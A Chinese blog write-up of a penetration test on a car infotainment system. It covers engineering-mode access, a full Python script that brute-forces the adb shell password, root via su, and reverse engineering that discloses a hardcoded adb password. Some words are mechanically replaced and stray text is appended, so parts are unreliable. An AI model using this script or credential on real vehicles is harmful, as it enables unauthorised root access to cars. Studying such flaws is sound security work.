很久之前尝试对某安汽车的车机系统进行渗透测试,但是却卡在入口无法进入,尝试暴力激活成功教程但是字典不够强大,没能成功。前段时间看到了绿盟科技博客的《新型车机,如何攻防?》感觉有点熟悉,再次探索发现可以获得车机系统root权限,遂事后诸葛亮一波,就当是学习笔记了。
通过在论坛、、贴吧收集到这款车型进入工程模式的方法,在拨号键盘输入*#*#888,然后点击拨号,如图:
进入密码认证界面,输入收集到的密码:,如图:
此时进入工程模式,可以看到工程模式的功能,如图:
点击“USB切换”可以将中控台下边的USB口切换为adb模式,从而通过数据线连接车机系统adb shell。可能我们需要启动USB调试,首先点击“打开系统设置原始界面 ——> Settings”,如图:
此时进入系统设置界面,可以看到下边有“关于智能平台”,如图:
点击“关于智能平台”后可以看到Android 版本、硬件型号版本号等等信息,如图:
连续点击7次版本号后开启开发者模式,然后开启USB调试,如图:
在连接adb shell时提示需要输入密码,如图:
当时卡在这里很久,编写Python脚本使用字典爆破了很久也没成功,Python3脚本如下:
import pexpect import random import sys # Open the password dictionary file if len(sys.argv) < 2: print("Usage: python3",sys.argv[0],"password.txt") exit(0) else: print("ADB Shell Brute --By Infiltrator") with open(sys.argv[1]) as f: passwords = f.readlines() adb = pexpect.spawnu("adb shell",timeout=1) #adb.logfile_read = sys.stdout # Try each password in the dictionary file for password in passwords: password = password.strip() # Remove leading/trailing whitespace # Wait for the password prompt try: s = adb.expect("password:") except: print("[!] Please check adb if connected!") exit(1) # Enter the password print("\r[*] Testing password:",password,end='') adb.sendline(password) # Wait for the output and check if we successfully logged in s = adb.expect(["verify success!", "verify failed!"]) if s == 0: # Login succeeded, we're done print("\n[+] Success! Password is:", password) break else: # Login failed, try the next password continue讯享网
直到看到新型车机,如何攻防?,文中逆向分析获得的密码立即让我觉得很是熟悉,如图:
我直接使用该密码就可以成功登录adb shell,同时把密码加入字典后也可以激活成功教程出来,说明脚本没问题:
并且直接执行su命令就获得root权限,如图:
虽然限制策略不严格但是,adb push和adb install都无法安装app,暂时就先不管这些了,先复现一下硬编码漏洞吧。
普通权限的adb pull命令基本获取不到什么有用的信息,执行adb root切换为root权限的adb,然后在使用adb pull将车机系统的文件系统下载到本地,如图:
由于下载的文件太多,等了几分钟也没下载完,然后就直接下载system目录了,如图:
在system/bin目录下发现adbd程序,如图:
使用IDA逆向分析,通过搜索password字符串定位程序输入,然而根本找不到password这个字符串,查看所有字符串可以发现程序调用了/system/bin/verify_sh,如图:
使用IDA分析verify_sh,同样直接搜索password字符串定位输入,然后跳转到代码上下文发现内存中Base64编码的内容:
解码之后为8769b3ad,应该是小端序的原因,将原本的adb36987在内存中存储为8769b3ad,如图:
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/49090.html